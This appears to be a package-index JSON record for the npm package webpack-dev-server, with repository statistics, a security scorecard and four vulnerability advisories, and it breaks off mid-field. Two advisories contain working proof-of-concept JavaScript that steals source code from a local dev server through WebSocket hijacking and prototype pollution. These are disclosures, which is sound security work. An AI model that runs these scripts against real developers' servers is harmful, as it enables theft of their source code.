{"id":1239336,"name":"webpack-dev-server","ecosystem":"npm","description":"Serves a webpack app. Updates the browser on changes.","homepage":"https://github.com/webpack/webpack-dev-server#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack-dev-server","keywords_array":[],"namespace":null,"versions_count":223,"first_release_published_at":"2012-09-18T15:45:16.603Z","latest_release_published_at":"2026-05-11T16:46:29.460Z","latest_release_number":"5.2.4","last_synced_at":"2026-06-01T23:13:19.195Z","created_at":"2022-04-08T14:35:25.389Z","updated_at":"2026-06-01T23:13:19.195Z","registry_url":"https://www.npmjs.com/package/webpack-dev-server","install_command":"npm install webpack-dev-server","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"webpack-1":"1.16.5","beta":"3.0.1-beta.0","webpack-3":"2.11.5","next":"4.0.0-rc.1","version-3":"3.11.3","version-4":"4.15.2","latest":"5.2.4"}},"repo_metadata":{"id":4692726,"uuid":"5839692","full_name":"webpack/webpack-dev-server","owner":"webpack","description":"Serves a webpack app. Updates the browser on changes. Documentation https://webpack.js.org/configuration/dev-server/.","archived":false,"fork":false,"pushed_at":"2026-05-22T05:07:13.000Z","size":64746,"stargazers_count":7852,"open_issues_count":49,"forks_count":1489,"subscribers_count":110,"default_branch":"main","last_synced_at":"2026-05-23T03:03:05.408Z","etag":null,"topics":["hot-reload","server","webpack"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-09-17T10:52:18.000Z","updated_at":"2026-05-22T07:23:28.000Z","dependencies_parsed_at":"2023-09-24T12:30:45.057Z","dependency_job_id":"7daf20b2-6185-4c69-94ef-8e60e20a2c90","html_url":"https://github.com/webpack/webpack-dev-server","commit_stats":{"total_commits":2583,"total_committers":288,"mean_commits":8.96875,"dds":0.7491289198606272,"last_synced_commit":"94a2443c8568c0ab4656d850b31499f5824bb0b6"},"previous_names":[],"tags_count":163,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack-dev-server","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/sbom","scorecard":{"id":766208,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack-dev-server","commit":"64e4afee9d29202ec14971ce97aff4d6e2cae2a9"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6.3,"checks":[{"name":"Code-Review","score":5,"reason":"Found 10/17 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/nodejs.yml:16","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Maintained","score":10,"reason":"23 commit(s) and 13 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:12: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/dependency-review.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/dependency-review.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/nodejs.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/nodejs.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/nodejs.yml:42: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/nodejs.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/nodejs.yml:83: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/nodejs.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/nodejs.yml:86: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/nodejs.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/nodejs.yml:102: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/nodejs.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/nodejs.yml:123: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack-dev-server/nodejs.yml/master?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/nodejs.yml:96","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   2 third-party GitHubAction dependencies pinned","Info:   2 out of   3 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":7,"reason":"3 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-23T00:53:26.873Z","repository_id":4692726,"created_at":"2025-08-23T00:53:26.874Z","updated_at":"2025-08-23T00:53:26.874Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33381989,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-23T01:21:08.577Z","status":"online","status_checked_at":"2026-05-23T02:00:05.530Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-05-29T21:13:44.872Z","dependent_packages_count":90823,"downloads":74875749,"downloads_period":"last-month","dependent_repos_count":2955806,"rankings":{"downloads":0.032582003289413346,"dependent_repos_count":0.00602356363333692,"dependent_packages_count":0.001013053883788482,"stargazers_count":1.1455175240525002,"forks_count":1.0200631214709104,"docker_downloads_count":0.04367083634169267,"average":0.374811683778607},"purl":"pkg:npm/webpack-dev-server","advisories":[{"uuid":"GSA_kwCzR0hTQS03OWNmLXhjcWMtYzc4d84ABXAd","url":"https://github.com/advisories/GHSA-79cf-xcqc-c78w","title":"webpack-dev-server vulnerable to cross-origin source code exposure on non-HTTPS origins","description":"### Impact\n\nWhen webpack-dev-server is running on a non-HTTPS origin (the default), cross-origin requests from malicious websites can load the dev server's JavaScript bundles via `\u003cscript\u003e` tags. The fix introduced in v5.2.1 (CVE-2025-30359) relied on `Sec-Fetch-Mode` and `Sec-Fetch-Site` request headers to block these requests, but browsers only send these headers for [potentially trustworthy origins](https://w3c.github.io/webappsec-secure-contexts/#is-origin-trustworthy). Over plain HTTP, the headers are absent and the check is bypassed.\n\nAn attacker who knows the dev server's host, port, and output path can exfiltrate all module source code by intercepting the webpack runtime's module registration.\n\nThis does not affect Chrome 142+ (and other Chromium-based browsers) due to [local network access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\n### Patches\n\nPatched in webpack-dev-server \u003e= 5.2.4 by setting `Cross-Origin-Resource-Policy: same-origin` on responses.\n\n### Workarounds\n\nRun the dev server with HTTPS enabled (`--https` or `server.type: 'https'` in config).\n\n### Resources\n\n- [GHSA-4v9v-hfq4-rm2v](https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v) (CVE-2025-30359) - original vulnerability\n- [GHSA-9jgg-88mc-972h](https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-9jgg-88mc-972h) (CVE-2025-30360) - prior bypass","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-18T13:31:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v","https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-79cf-xcqc-c78w","https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-9jgg-88mc-972h","https://nvd.nist.gov/vuln/detail/CVE-2026-6402","https://cna.openjsf.org/security-advisories.html","https://github.com/advisories/GHSA-79cf-xcqc-c78w"],"source_kind":"github","identifiers":["GHSA-79cf-xcqc-c78w","CVE-2026-6402"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-18T14:00:16.774Z","updated_at":"2026-05-23T06:00:18.054Z","epss_percentage":0.00032,"epss_percentile":0.09738,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OWNmLXhjcWMtYzc4d84ABXAd","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03OWNmLXhjcWMtYzc4d84ABXAd","packages":[{"ecosystem":"npm","package_name":"webpack-dev-server","versions":[{"first_patched_version":"5.2.4","vulnerable_version_range":"\u003c= 5.2.3"}],"purl":"pkg:npm/webpack-dev-server"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OWNmLXhjcWMtYzc4d84ABXAd/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05amdnLTg4bWMtOTcyaM4ABIpL","url":"https://github.com/advisories/GHSA-9jgg-88mc-972h","title":"webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser","description":"### Summary\nSource code may be stolen when you access a malicious web site with non-Chromium based browser.\n\n### Details\nThe `Origin` header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.\nBut webpack-dev-server always allows IP address `Origin` headers.\nhttps://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127\nThis allows websites that are served on IP addresses to connect WebSocket.\nBy using the same method described in [the article](https://blog.cal1.cn/post/Sniffing%20Codes%20in%20Hot%20Module%20Reloading%20Messages) linked from CVE-2018-14732, the attacker get the source code.\n\nrelated commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that `checkHost` function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.\n\nThis vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to [the non-HTTPS private access blocking feature](https://developer.chrome.com/blog/private-network-access-update#chrome_94).\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18418233/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `http://{ipaddress}/?target=http://localhost:8080\u0026file=main` with a non-Chromium browser (I used Firefox 134.0.1)\n5. Edit `src/index.js` in the extracted directory\n6. You can see the content of `src/index.js`\n\n![image](https://github.com/user-attachments/assets/7ce3cad7-1a4d-4778-baae-1adae5e93ba4)\n\nThe script in the POC site is:\n```js\nwindow.webpackHotUpdate = (...args) =\u003e {\n    console.log(...args);\n    for (i in args[1]) {\n        document.body.innerText = args[1][i].toString() + document.body.innerText\n\t    console.log(args[1][i])\n    }\n}\n\nlet params = new URLSearchParams(window.location.search);\nlet target = new URL(params.get('target') || 'http://127.0.0.1:8080');\nlet file = params.get('file')\nlet wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';\nlet wsPort = target.port;\nvar currentHash = '';\nvar currentHash2 = '';\nlet wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;\nws = new WebSocket(wsTarget);\nws.onmessage = event =\u003e {\n    console.log(event.data);\n    if (event.data.match('\"type\":\"ok\"')) {\n        s = document.createElement('script');\n        s.src = `${target}${file}.${currentHash2}.hot-update.js`;\n        document.body.appendChild(s)\n    }\n    r = event.data.match(/\"([0-9a-f]{20})\"/);\n    if (r !== null) {\n        currentHash2 = currentHash;\n        currentHash = r[1];\n        console.log(currentHash, currentHash2);\n    }\n}\n```\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:09:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-9jgg-88mc-972h","https://nvd.nist.gov/vuln/detail/CVE-2025-30360","https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb","https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239","https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127","https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e","https://github.com/advisories/GHSA-9jgg-88mc-972h"],"source_kind":"github","identifiers":["GHSA-9jgg-88mc-972h","CVE-2025-30360"],"repository_url":"https://github.com/webpack/webpack-dev-server","blast_radius":0.0,"created_at":"2025-06-04T22:08:12.967Z","updated_at":"2026-05-23T06:03:25.088Z","epss_percentage":0.00039,"epss_percentile":0.11861,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05amdnLTg4bWMtOTcyaM4ABIpL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05amdnLTg4bWMtOTcyaM4ABIpL","packages":[{"ecosystem":"npm","package_name":"webpack-dev-server","versions":[{"first_patched_version":"5.2.1","vulnerable_version_range":"\u003c= 5.2.0"}],"purl":"pkg:npm/webpack-dev-server"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05amdnLTg4bWMtOTcyaM4ABIpL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00djl2LWhmcTQtcm0yds4ABIpK","url":"https://github.com/advisories/GHSA-4v9v-hfq4-rm2v","title":"webpack-dev-server users' source code may be stolen when they access a malicious web site","description":"### Summary\nSource code may be stolen when you access a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:8080/main.js\"\u003e` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.\nBy using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code.\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18426585/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/`\n5. You can see the source code output in the document and the devtools console.\n\n![image](https://github.com/user-attachments/assets/9d4dcdca-5d24-4c84-a7b4-feb1782bca09)\n\nThe script in the POC site is:\n```js\nlet moduleList\nconst onHandlerSet = (handler) =\u003e {\n  console.log('h', handler)\n  moduleList = handler.require.m\n}\n\nconst originalArrayForEach = Array.prototype.forEach\nArray.prototype.forEach = function forEach(callback, thisArg) {\n  callback((handler) =\u003e {\n    onHandlerSet(handler)\n  })\n  originalArrayForEach.call(this, callback, thisArg)\n  Array.prototype.forEach = originalArrayForEach\n}\n\nconst script = document.createElement('script')\nscript.src = 'http://localhost:8080/main.js'\nscript.addEventListener('load', () =\u003e {\n  console.log(moduleList)\n  for (const key in moduleList) {\n    const p = document.createElement('p')\n    const title = document.createElement('strong')\n    title.textContent = key\n    const code = document.createElement('code')\n    code.textContent = moduleList[key].toString()\n    p.append(title, ':', document.createElement('br'), code)\n    document.body.appendChild(p)\n  }\n})\ndocument.head.appendChild(script)\n```\n\nThis script uses the function generated by [`renderRequire`](https://github.com/webpack/webpack/blob/3919c844eca394d73ca930e4fc5506fb86e2b094/lib/javascript/JavascriptModulesPlugin.js#L1383).\n```js\n    // The require function\n    function __webpack_require__(moduleId) {\n        // Check if module is in cache\n        var cachedModule = __webpack_module_cache__[moduleId];\n        if (cachedModule !== undefined) {\n            return cachedModule.exports;\n        }\n        // Create a new module (and put it into the cache)\n        var module = __webpack_module_cache__[moduleId] = {\n            // no module.id needed\n            // no module.loaded needed\n            exports: {}\n        };\n        // Execute the module function\n        var execOptions = {\n            id: moduleId,\n            module: module,\n            factory: __webpack_modules__[moduleId],\n            require: __webpack_require__\n        };\n        __webpack_require__.i.forEach(function(handler) {\n            handler(execOptions);\n        });\n        module = execOptions.module;\n        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);\n        // Return the exports of the module\n        return module.exports;\n    }\n```\nEspecially, it uses the fact that `Array::forEach` is called for `__webpack_require__.i` and `execOptions` contains `__webpack_require__`.\nIt uses prototype pollution against `Array::forEach` to extract `__webpack_require__` reference.\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.\n\n\u003cdetails\u003e\n\u003csummary\u003eOld content\u003c/summary\u003e\n\n### Summary\nSource code may be stolen when you use [`output.iife: false`](https://webpack.js.org/configuration/output/#outputiife) and access a malicious web site.\n\n### Details\nWhen `output.iife: false` is set, some global variables for the webpack runtime are declared on the `window` object (e.g. `__webpack_modules__`).\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:8080/main.js\"\u003e` in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the `window` object.\nBy using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code.\n\nI pointed out `output.iife: false`, but if there are other options that makes the webpack runtime variables to be declared on the `window` object, the same will apply for those cases.\n\n### PoC\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18409777/reproduction.zip) and extract it\n2. Run `npm i`\n3. Run `npx webpack-dev-server`\n4. Open `https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/`\n5. Open the devtools console.\n6. You can see the content of `src/index.js` and other scripts loaded.\n\n![image](https://github.com/user-attachments/assets/87801607-57bb-4656-bc0d-2bfbe207f436)\n\nThe script in the POC site is:\n```js\nconst script = document.createElement('script')\nscript.src = 'http://localhost:8080/main.js'\nscript.addEventListener('load', () =\u003e {\n    for (const module in window.__webpack_modules__) {\n        console.log(`${module}:`, window.__webpack_modules__[module].toString())\n    }\n})\ndocument.head.appendChild(script)\n```\n\n### Impact\nThis vulnerability can result in the source code to be stolen for users that has `output.iife: false` option set and uses a predictable port and output path for the entrypoint script.\n\n\u003c/details\u003e","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:09:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v","https://nvd.nist.gov/vuln/detail/CVE-2025-30359","https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e","https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239","https://github.com/advisories/GHSA-4v9v-hfq4-rm2v"],"source_kind":"github","identifiers":["GHSA-4v9v-hfq4-rm2v","CVE-2025-30359"],"repository_url":"https://github.com/webpack/webpack-dev-server","blast_radius":0.0,"created_at":"2025-06-04T22:08:13.468Z","updated_at":"2026-05-23T06:03:25.089Z","epss_percentage":0.00106,"epss_percentile":0.28351,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00djl2LWhmcTQtcm0yds4ABIpK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00djl2LWhmcTQtcm0yds4ABIpK","packages":[{"ecosystem":"npm","package_name":"webpack-dev-server","versions":[{"first_patched_version":"5.2.1","vulnerable_version_range":"\u003c= 5.2.0"}],"purl":"pkg:npm/webpack-dev-server"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00djl2LWhmcTQtcm0yds4ABIpK/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmNjYteHdmcC1ndmM0","url":"https://github.com/advisories/GHSA-cf66-xwfp-gvc4","title":"Missing Origin Validation in webpack-dev-server","description":"Versions of `webpack-dev-server` before 3.1.10 are missing origin validation on the websocket server. This vulnerability allows a remote attacker to steal a developer's source code because the origin of requests to the websocket server that is used for Hot Module Replacement (HMR) are not validated.\n\n\n## Recommendation\nFor `webpack-dev-server` update to version 3.1.11 or later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2019-01-04T17:40:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2018-14732","https://github.com/webpack/webpack-dev-server/commit/f18e5adf123221a1015be63e1ca2491ca45b8d10","https://www.npmjs.com/advisories/725","https://github.com/webpack/webpack-dev-server/issues/1445","https://github.com/webpack/webpack-dev-server/blob/master/CHANGELOG.md#3111-2018-12-21","https://github.com/webpack/webpack-dev-server/issues/1620","https://github.com/advisories/GHSA-cf66-xwfp-gvc4"],"source_kind":"github","identifiers":["GHSA-cf66-xwfp-gvc4","CVE-2018-14732"],"repository_url":"https://github.com/webpack/webpack-dev-server","blast_radius":0.0,"created_at":"2022-12-21T16:13:32.181Z","updated_at":"2026-06-01T13:12:30.385Z","epss_percentage":0.00177,"epss_percentile":0.38853,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmNjYteHdmcC1ndmM0","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmNjYteHdmcC1ndmM0","packages":[{"ecosystem":"npm","package_name":"webpack-dev-server","versions":[{"first_patched_version":"3.1.11","vulnerable_version_range":"\u003c 3.1.11"}],"purl":"pkg:npm/webpack-dev-server"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWNmNjYteHdmcC1ndmM0/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-dev-server","docker_dependents_count":11036,"docker_downloads_count":3041820900,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-dev-server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-dev-server/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":true,"issue_metadata":{"last_synced_at":"2026-04-28T13:03:41.408Z","issues_count":193,"pull_requests_count":1173,"avg_time_to_close_issue":16579110.41401274,"avg_time_to_close_pull_request":2735523.7483317447,"issues_closed_count":157,"pull_requests_closed_count":1049,"pull_request_authors_count":68,"issue_authors_count":169,"avg_comments_per_issue":8.77720207253886,"avg_comments_per_pull_request":1.2659846547314577,"merged_pull_requests_count":502,"bot_issues_count":3,"bot_pull_requests_count":845,"past_year_issues_count":23,"past_year_pull_requests_count":181,"past_year_avg_time_to_close_issue":913270.875,"past_year_avg_time_to_close_pull_request":184298.95454545456,"past_year_issues_closed_count":16,"past_year_pull_requests_closed_count":132,"past_year_pull_request_authors_count":21,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":2.3478260869565215,"past_year_avg_comments_per_pull_request":0.9171270718232044,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":115,"past_year_merged_pull_requests_count":48,"issues_url":"https://issues.ecosyste.ms/api/v1